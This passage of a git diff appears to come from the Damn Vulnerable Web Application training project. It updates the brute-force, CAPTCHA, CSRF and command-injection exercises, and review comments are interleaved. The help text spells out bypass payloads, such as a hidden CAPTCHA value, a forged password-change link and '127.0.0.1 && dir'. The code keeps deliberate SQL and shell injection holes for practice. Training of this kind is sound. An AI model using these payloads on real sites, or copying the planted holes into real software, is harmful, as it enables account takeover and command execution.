    "; } // Reset bad login count - $insert = "UPDATE `users` SET `failed_login` = '0' WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $insert ); + $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); + // Give the user some feedback $html .= "

    Username and/or password incorrect.

    Alternative, the account has been locked because of too many failed logins.
    If this is the case, please try again in {$lockout_time} minutes.
    "; - $query = "UPDATE `users` SET `failed_login` = failed_login + 1 WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $query ); + // Update bad login count + $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } - $query = "UPDATE `users` SET `last_login` = now() WHERE user='$user' LIMIT 1;"; - $result = @mysql_query( $query ); + // Set the last login time + $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/brute/source/low.php b/vulnerabilities/brute/source/low.php index 18ebb1a03..3ab2988aa 100644 --- a/vulnerabilities/brute/source/low.php +++ b/vulnerabilities/brute/source/low.php @@ -1,19 +1,22 @@ ' . mysql_error() . '' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -21,6 +24,8 @@ // Login failed $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/brute/source/medium.php b/vulnerabilities/brute/source/medium.php index f42638e58..195b377df 100644 --- a/vulnerabilities/brute/source/medium.php +++ b/vulnerabilities/brute/source/medium.php @@ -10,14 +10,15 @@ $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; + // Check the database + $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -26,6 +27,8 @@ sleep( 2 ); $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/captcha/help/help.php b/vulnerabilities/captcha/help/help.php index 46cd28bd7..aa9dfaec8 100644 --- a/vulnerabilities/captcha/help/help.php +++ b/vulnerabilities/captcha/help/help.php @@ -1,32 +1,55 @@
    -

    Help - Insecure CAPTCHA (Intro to Logic Flaws)

    +

    Help - Insecure CAPTCHA

    -

    A CAPTCHA is a program that can tell whether its user is a human or a computer. You've probably seen - them - colorful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from +

    About

    +

    A is a program that can tell whether its user is a human or a computer. You've probably seen + them - colourful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from "bots", or automated programs usually written to generate spam. No computer program can read distorted text as well as humans can, so bots cannot navigate sites protected by CAPTCHAs.

    -

    CAPTCHAs are often used to protect sensative functionality from automated bots. Such functionality typically includes user registration and changes, - password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the Administrator account. This provides +

    CAPTCHAs are often used to protect sensitive functionality from automated bots. Such functionality typically includes user registration and changes, + password changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the user account. This provides limited protection from CSRF attacks as well as automated bot guessing.

    +


    + +

    Objective

    +

    Your aim, change the current user's password in a automated manner because of the poor CAPTCHA system.

    + +


    + +

    Low Level

    The issue with this CAPTCHA is that it is easily bypassed. The developer has made the assumption that all users will progress through screen 1, complete the CAPTCHA, and then - move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA.

    + move on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA system.

    +

    The parameters required to complete this challenge in low security would be similar to the following:

    -

    step=2&password_new=password&password_conf=password&Change=Change

    +
    Spoiler: ?step=2&password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    The developer has attempted to place state around the session and keep track of whether the user successfully completed the + CAPTCHA prior to submitting data. Because the state variable (Spoiler: passed_captcha) is on the client side, + it can also be manipulated by the attacker like so:

    +
    Spoiler: ?step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change.
    + +
    -

    For the medium level challenge, the developer has attempted to place state around the session and keep track of whether the user successfully completed the - CAPTCHA prior to submitting data. Because the state variable ("passed_captcha") is on the client side, it can also be manipulated by the attacker like so:

    -

    step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change

    +

    High Level

    +

    There has been development code left in, which was never removed in production. It is possible to mimic the development values, to allow + invalid values in be placed into the CAPTCHA field.

    +

    You will need to spoof your user-agent (Spoiler: reCAPTCHA) as well as use the CAPTCHA value of + (Spoiler: hidd3n_valu3) to skip the check.

    -

    In the high level, *coming soon*.

    +
    -

    In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one - single step. Alternatively, the developer could have moved the state variable server side, or NONCE'd the form.

    +

    Impossible Level

    +

    In the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one + single step. Alternatively, the developer could have moved the state variable server side (from the medium level), so the user cannot alter it.

    @@ -35,5 +58,5 @@
    -

    Reference: http://www.captcha.net/

    +

    Reference:

    diff --git a/vulnerabilities/captcha/index.php b/vulnerabilities/captcha/index.php index 2d96a5773..d02db91d5 100644 --- a/vulnerabilities/captcha/index.php +++ b/vulnerabilities/captcha/index.php @@ -1,13 +1,13 @@ Change your password:"; -} -else { - $heading = "reCAPTCHA API key NULL in config file: " . realpath( dirname( dirname( getcwd() ) ) . "/config/config.inc.php" ) . "
    Please register for a key from reCAPTCHA: ".dvwaExternalLinkUrlGet('https://www.google.com/recaptcha/admin/create'); +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/captcha/source/{$vulnerabilityFile}"; + +// Check if we have a reCAPTCHA key +$WarningHtml = ''; +if( $_DVWA[ 'recaptcha_public_key' ] == "" ) { + $WarningHtml = "
    reCAPTCHA API key missing from config file: " . realpath( dirname( dirname( getcwd() ) ) . "/config/config.inc.php" ) . "
    "; + $html = "Please register for a key from reCAPTCHA: " . dvwaExternalLinkUrlGet('https://www.google.com/recaptcha/admin/create'); + $hide_form = true; } $page[ 'body' ] .= "

    Vulnerability: Insecure CAPTCHA

    -
    - {$heading} -
    + {$WarningHtml} +
    \n"; if( $vulnerabilityFile == 'impossible.php' ) { @@ -84,12 +87,11 @@
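Review bot: `if( $_DVWA[ 'recaptcha_public_key' ] == "" )` uses a loose comparison and reads the key without first checking that it exists, so a config file that omits `recaptcha_public_key` altogether produces an undefined-index notice instead of the new warning. `if( !isset( $_DVWA[ 'recaptcha_public_key' ] ) || $_DVWA[ 'recaptcha_public_key' ] === '' ) {` covers both the missing and the empty case. The `$page[ 'body' ] .= ` string the warning is inserted into continues past the end of this hunk, and the file's opening lines are not visible in this rendering.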

    More Information

      -
    • ".dvwaExternalLinkUrlGet( 'http://www.captcha.net/' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' )."
    • -
    • ".dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-012)' )."
    • +
    • " . dvwaExternalLinkUrlGet( 'http://www.captcha.net/' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' ) . "
    • +
    • " . dvwaExternalLinkUrlGet( 'https://www.owasp.org/index.php/Testing_for_Captcha_(OWASP-AT-012)' ) . "
    -
    -"; +
    \n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/captcha/source/high.php b/vulnerabilities/captcha/source/high.php index a75c91dc8..ba02a4a33 100644 --- a/vulnerabilities/captcha/source/high.php +++ b/vulnerabilities/captcha/source/high.php @@ -1,37 +1,47 @@ is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { + // Did the CAPTCHA fail? + if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) { // What happens when the CAPTCHA was entered incorrectly $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for user $html .= "
    Password Changed.
    "; } else { + // Ops. Password mismatch $html .= "
    Both passwords must match.
    "; $hide_form = false; } } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/captcha/source/impossible.php b/vulnerabilities/captcha/source/impossible.php index 846f48e7d..c91398608 100644 --- a/vulnerabilities/captcha/source/impossible.php +++ b/vulnerabilities/captcha/source/impossible.php @@ -4,8 +4,10 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); + // Hide the CAPTCHA form $hide_form = true; + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_new = stripslashes( $pass_new ); $pass_new = mysql_real_escape_string( $pass_new ); @@ -21,12 +23,14 @@ $pass_curr = mysql_real_escape_string( $pass_curr ); $pass_curr = md5( $pass_curr ); + // Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], $_SERVER[ 'REMOTE_ADDR' ], $_POST[ 'recaptcha_challenge_field' ], $_POST[ 'recaptcha_response_field' ] ); - if(!$resp->is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; @@ -34,17 +38,26 @@ } else { // Check that the current password is correct - $query = "SELECT password FROM `users` WHERE user='" . dvwaCurrentUser() . "' AND password='$pass_curr';"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); - if( ( $pass_new == $pass_conf) && ( $result && mysql_num_rows( $result ) == 1 ) ) { - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; - $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Do both new password match and was the current password correct? + if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) { + // Update the database + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); - $html .= "
    Password Changed.
    "; + // Feedback for the end user - success! + $html .= "
    Password Changed.
    "; } else { - $html .= "
    Either your current password is incorrect or the new passwords did not match. Please try again.
    "; + // Feedback for the end user - failed! + $html .= "
    Either your current password is incorrect or the new passwords did not match.
    Please try again.
    "; + $hide_form = false; } } } diff --git a/vulnerabilities/captcha/source/low.php b/vulnerabilities/captcha/source/low.php index f772c5c50..f5103cd79 100644 --- a/vulnerabilities/captcha/source/low.php +++ b/vulnerabilities/captcha/source/low.php @@ -1,24 +1,30 @@ is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly $html .= "
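Review bot: `$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR )` passes a function return value to a by-reference parameter, which PHP reports as "Only variables should be passed by reference"; either assign `$user = dvwaCurrentUser();` first or use `bindValue`, which takes the value directly. The following `$data->rowCount() == 1` relies on a row count for a SELECT, which PDO documents as driver-dependent; fetching the row with `$data->fetch()` and testing for a result is portable. Both patterns also appear in the csrf impossible.php hunk of this commit, and the new UPDATE here has no `LIMIT 1` while the captcha high.php hunk adds one to its equivalent statement. The `else` branch this code sits in belongs to a block that begins above the hunk.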

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { + // Show next stage for the user $html .= "

    You passed the CAPTCHA! Click the button to confirm your changes.
    @@ -29,6 +35,7 @@ "; } else { + // Both new passwords do not match. $html .= "
    Both passwords must match.
    "; $hide_form = false; } @@ -36,29 +43,33 @@ } if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form $hide_form = true; + + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_conf = $_POST[ 'password_conf' ]; - if( $pass_new != $pass_conf ) { - $html .= "

    Both passwords must match.
    "; - $hide_form = false; - return; - } - - $pass = md5( $pass_new ); + // Check to see if both password match if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the end user $html .= "
    Password Changed.
    "; } else { + // Issue with the passwords matching $html .= "
    Passwords did not match.
    "; + $hide_form = false; } + + mysql_close(); } ?> diff --git a/vulnerabilities/captcha/source/medium.php b/vulnerabilities/captcha/source/medium.php index 5812efc0b..8fed10262 100644 --- a/vulnerabilities/captcha/source/medium.php +++ b/vulnerabilities/captcha/source/medium.php @@ -1,24 +1,30 @@ is_valid) { + // Did the CAPTCHA fail? + if( !$resp->is_valid ) { // What happens when the CAPTCHA was entered incorrectly - $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; + $html .= "

    The CAPTCHA was incorrect. Please try again.
    "; $hide_form = false; return; } else { + // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { + // Show next stage for the user $html .= "

    You passed the CAPTCHA! Click the button to confirm your changes.
    @@ -30,6 +36,7 @@
    "; } else { + // Both new passwords do not match. $html .= "
    Both passwords must match.
    "; $hide_form = false; } @@ -37,29 +44,40 @@ } if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form $hide_form = true; + + // Get input $pass_new = $_POST[ 'password_new' ]; $pass_conf = $_POST[ 'password_conf' ]; - if(!$_POST[ 'passed_captcha' ]) { + // Check to see if they did stage 1 + if( !$_POST[ 'passed_captcha' ] ) { $html .= "

    You have not passed the CAPTCHA.
    "; $hide_form = false; return; } - $pass = md5( $pass_new ); + // Check to see if both password match if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the end user $html .= "
    Password Changed.
    "; } else { + // Issue with the passwords matching $html .= "
    Passwords did not match.
    "; + $hide_form = false; } + + mysql_close(); } ?> diff --git a/vulnerabilities/csrf/help/help.php b/vulnerabilities/csrf/help/help.php index 7892220c9..c025b03d8 100644 --- a/vulnerabilities/csrf/help/help.php +++ b/vulnerabilities/csrf/help/help.php @@ -5,9 +5,46 @@
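Review bot: `if( !$_POST[ 'passed_captcha' ] )` dereferences a key that a step-2 request need not carry, so a request without it raises an undefined-index notice before the intended "You have not passed the CAPTCHA." feedback is produced. `if( !isset( $_POST[ 'passed_captcha' ] ) || !$_POST[ 'passed_captcha' ] ) {` keeps the client-side flag check that the help text describes as the point of this level while handling the absent key cleanly. The `step == '2'` block containing the check starts and ends inside this hunk.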
    -

    CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social - engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit - can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

    +

    About

    +

    CSRF is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. + With a little help of social engineering (such as sending a link via email/chat), an attacker may force the users of a web application to execute actions of + the attacker's choosing.

    + +

    A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is + the administrator account, this can compromise the entire web application.

    + +

    This attack may also be called "XSRF", similar to "Cross Site scripting (XSS)", and they are often used together.

    + +


    + +

    Objective

    +

    Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.

    + +


    + +

    Low Level

    +

    There are no measures in place to protect against this attack. This means a link can be crafted to achieve a certain action (in this case, change the current users password). + Then with some basic social engineering, have the target click the link (or just visit a certain page), to trigger the action.

    +
    Spoiler: ?password_new=password&password_conf=password&Change=Change.
    + +
    + +

    Medium Level

    +

    For the medium level challenge, there is a check to see where the last requested page came from. The developer believes if it matches the current domain, + it must of come from the web application so it can be trusted.

    +

    It may be required to link in multiple vulnerabilities to exploit this vector, such as reflective XSS.

    + +
    + +

    High Level

    +

    In the high level, the developer has added an "anti Cross-Site Request Forgery (CSRF) token". In order by bypass this protection method, another vulnerability will be required.

    +
    Spoiler: e.g. Javascript is a executed on the client side, in the browser.
    + +
    + +

    Impossible Level

    +

    In the impossible level, the challenge will extent the high level and asks for the current user's password. As this cannot be found out (only predicted or brute forced), + there is not an attack vector here.

    @@ -16,5 +53,5 @@
    -

    Reference: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

    +

    Reference:

    diff --git a/vulnerabilities/csrf/index.php b/vulnerabilities/csrf/index.php index 523a469b1..a58762521 100644 --- a/vulnerabilities/csrf/index.php +++ b/vulnerabilities/csrf/index.php @@ -1,12 +1,12 @@ -

    Vulnerability: Cross Site Request Forgery (CSRF)

    +

    Vulnerability: Cross Site Request Forgery (CSRF)

    -
    +

    Change your admin password:


    @@ -53,8 +53,7 @@ Confirm new password:


    - -"; + \n"; if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -62,16 +61,15 @@ $page[ 'body' ] .= " {$html} -
    - -

    More Information

    - -
    -"; +
    + +

    More Information

    + +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/csrf/source/high.php b/vulnerabilities/csrf/source/high.php index 06e941545..29542c76b 100644 --- a/vulnerabilities/csrf/source/high.php +++ b/vulnerabilities/csrf/source/high.php @@ -4,22 +4,29 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Turn requests into variables + // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; + // Do the passwords match? if( $pass_new == $pass_conf ) { + // They do! $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); + // Update the database $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/csrf/source/impossible.php b/vulnerabilities/csrf/source/impossible.php index e35935073..eb98a51bb 100644 --- a/vulnerabilities/csrf/source/impossible.php +++ b/vulnerabilities/csrf/source/impossible.php @@ -4,7 +4,7 @@ // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); - // Turn requests into variables + // Get input $pass_curr = $_GET[ 'password_current' ]; $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; @@ -15,19 +15,29 @@ $pass_curr = md5( $pass_curr ); // Check that the current password is correct - $query = "SELECT password FROM `users` WHERE user='" . dvwaCurrentUser() . "' AND password='$pass_curr';"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); - - if( ( $pass_new == $pass_conf ) && ( $result && mysql_num_rows( $result ) == 1 ) ) { + $data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->bindParam( ':password', $pass_curr, PDO::PARAM_STR ); + $data->execute(); + + // Do both new passwords match and does the current password match the user? + if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) { + // It does! + $pass_new = stripslashes( $pass_new ); $pass_new = mysql_real_escape_string( $pass_new ); $pass_new = md5( $pass_new ); - $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = 'admin';"; - $result = mysql_query( $insert ) or die( '
    ' . mysql_error() . '
    ' ); + // Update database with new password + $data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' ); + $data->bindParam( ':password', $pass_new, PDO::PARAM_STR ); + $data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR ); + $data->execute(); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match or current password incorrect.
    "; } } diff --git a/vulnerabilities/csrf/source/low.php b/vulnerabilities/csrf/source/low.php index 7342ef8ea..4e5cbd07c 100644 --- a/vulnerabilities/csrf/source/low.php +++ b/vulnerabilities/csrf/source/low.php @@ -1,22 +1,29 @@ ' . mysql_error() . '' ); + // Feedback for the user $html .= "
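Review bot: With the UPDATE now parameterized, the `mysql_real_escape_string( $pass_new )` before `md5( $pass_new )` no longer serves a quoting purpose, yet it still changes what gets hashed for any password containing a quote or backslash and depends on a legacy mysql_* link being open elsewhere. Hashing the raw `$pass_new` (after the existing `stripslashes`) makes the stored hash a function of the password alone; whether the login path applies the same escaping should be confirmed before changing it. This reference level also still takes `password_current`, `password_new` and `password_conf` from `$_GET` (context lines of the first hunk), so they end up in server access logs and browser history; a POST form avoids that. The `if` block this code sits in begins before the hunk.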
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/csrf/source/medium.php b/vulnerabilities/csrf/source/medium.php index 495960358..b0b1c3d03 100644 --- a/vulnerabilities/csrf/source/medium.php +++ b/vulnerabilities/csrf/source/medium.php @@ -1,28 +1,36 @@ ' . mysql_error() . '' ); + // Feedback for the user $html .= "
    Password Changed.
    "; } else { + // Issue with passwords matching $html .= "
    Passwords did not match.
    "; } } else { + // Didn't come from a trusted source $html .= "
    That request didn't look correct.
    "; } + + mysql_close(); } ?> diff --git a/vulnerabilities/exec/help/help.php b/vulnerabilities/exec/help/help.php index 70cdb57cb..55d60fcfb 100644 --- a/vulnerabilities/exec/help/help.php +++ b/vulnerabilities/exec/help/help.php @@ -5,12 +5,51 @@
    +

    About

    The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable application. - In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it - as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection - attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

    + In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it + as any authorized system user. However, commands are executed with the same privileges and environment as the web service has.

    -

    To add a command use ; for linux and && for windows. Example: 127.0.0.1 && dir

    +

    Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker + (forms, cookies, HTTP headers etc.).

    + +

    The syntax and commands may differ between the Operating Systems (OS), such as Linux and Windows, depending on their desired actions.

    + +

    This attack may also be called "Remote Command Execution (RCE)".

    + +


    + +

    Objective

    +

    Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

    + +


    + +

    Low Level

    +

    This allows for direct input into one of many PHP functions that will execute commands on the OS. It is possible to escape out of the designed command and + executed unintentional actions.

    +

    This can be done by adding on to the request, "once the command has executed successfully, run this command". +

    Spoiler: To add a command "&&". Example: 127.0.0.1 && dir.
    + +
    + +

    Medium Level

    +

    The developer has read up on some of the issues with command injection, and placed in various pattern patching to filter the input. However, this isn't enough.

    +

    Various other system syntaxes can be used to break out of the desired command.

    +
    Spoiler: e.g. background the ping command.
    + +
    + +

    High Level

    +

    In the high level, the developer goes back to the drawing board and puts in even more pattern to match. But even this isn't enough.

    +

    The developer has either made a slight typo with the filters and believes a certain PHP command will save them from this mistake.

    +
    Spoiler: 
    +			removes all leading & trailing spaces, right?.
    + +
    + +

    Impossible Level

    +

    In the impossible level, the challenge has been re-written, only to allow a very stricted input. If this doesn't match and doesn't produce a certain result, + it will not be allowed to execute. Rather than "black listing" filtering (allowing any input and removing unwanted), this uses "white listing" (only allow certain values).

    @@ -19,5 +58,5 @@
    -

    Reference: https://www.owasp.org/index.php/Command_Injection

    +

    Reference:

    diff --git a/vulnerabilities/exec/index.php b/vulnerabilities/exec/index.php index f6856df53..4297a819c 100644 --- a/vulnerabilities/exec/index.php +++ b/vulnerabilities/exec/index.php @@ -1,12 +1,12 @@ @@ -42,9 +42,8 @@

    Enter an IP address: - -

    -"; + +

    \n"; if( $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -56,13 +55,12 @@

    More Information

    - -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/exec/source/high.php b/vulnerabilities/exec/source/high.php index f4cf1b54d..2f4a5a7d2 100644 --- a/vulnerabilities/exec/source/high.php +++ b/vulnerabilities/exec/source/high.php @@ -1,9 +1,10 @@ '', ';' => '', @@ -16,17 +17,21 @@ '||' => '', ); + // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { - $cmd = shell_exec( 'ping ' . $target ); - $html .= "
    {$cmd}
    "; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/exec/source/impossible.php b/vulnerabilities/exec/source/impossible.php index 7413f0fc6..a2d405e4d 100644 --- a/vulnerabilities/exec/source/impossible.php +++ b/vulnerabilities/exec/source/impossible.php @@ -1,9 +1,10 @@ {$cmd}"; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
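Review bot: The hoisted `$html .= "{$cmd}"` embeds the raw output of `shell_exec` in the page, and ping echoes the supplied target in that output, so any markup that survives the blacklist above lands in the HTML unencoded; emitting `htmlspecialchars( $cmd, ENT_QUOTES, 'UTF-8' )` instead keeps the command-injection exercise unchanged while fixing the separate output-encoding gap. `shell_exec` also returns null when the command produces no output, in which case the feedback block is simply empty rather than an error. The same hoisted line is in the exec low.php, medium.php and impossible.php hunks; for impossible.php the octet validation makes the encoding moot, but doing it consistently costs nothing.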
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } else { + // Ops. Let the user name theres a mistake $html .= '
    ERROR: You have entered an invalid IP.
    '; } } diff --git a/vulnerabilities/exec/source/low.php b/vulnerabilities/exec/source/low.php index 1f5b32f07..121362f59 100644 --- a/vulnerabilities/exec/source/low.php +++ b/vulnerabilities/exec/source/low.php @@ -1,17 +1,21 @@ {$cmd}"; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/exec/source/medium.php b/vulnerabilities/exec/source/medium.php index 6ce2d2935..99da21100 100644 --- a/vulnerabilities/exec/source/medium.php +++ b/vulnerabilities/exec/source/medium.php @@ -1,25 +1,30 @@ '', ';' => '', ); + // Remove any of the charactars in the array (blacklist). $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { - $cmd = shell_exec( 'ping ' . $target ); - $html .= "
    {$cmd}
    "; + // Windows + $cmd = shell_exec( 'ping ' . $target ); } else { - $cmd = shell_exec( 'ping -c 4 ' . $target ); - $html .= "
    {$cmd}
    "; + // *nix + $cmd = shell_exec( 'ping -c 4 ' . $target ); } + + // Feedback for the end user + $html .= "
    {$cmd}
    "; } ?> diff --git a/vulnerabilities/fi/file1.php b/vulnerabilities/fi/file1.php index 5ead05e90..751446172 100644 --- a/vulnerabilities/fi/file1.php +++ b/vulnerabilities/fi/file1.php @@ -6,17 +6,16 @@

    File 1


    - Hello ".dvwaCurrentUser()."
    + Hello " . dvwaCurrentUser() . "
    Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}

    [back]

    More info

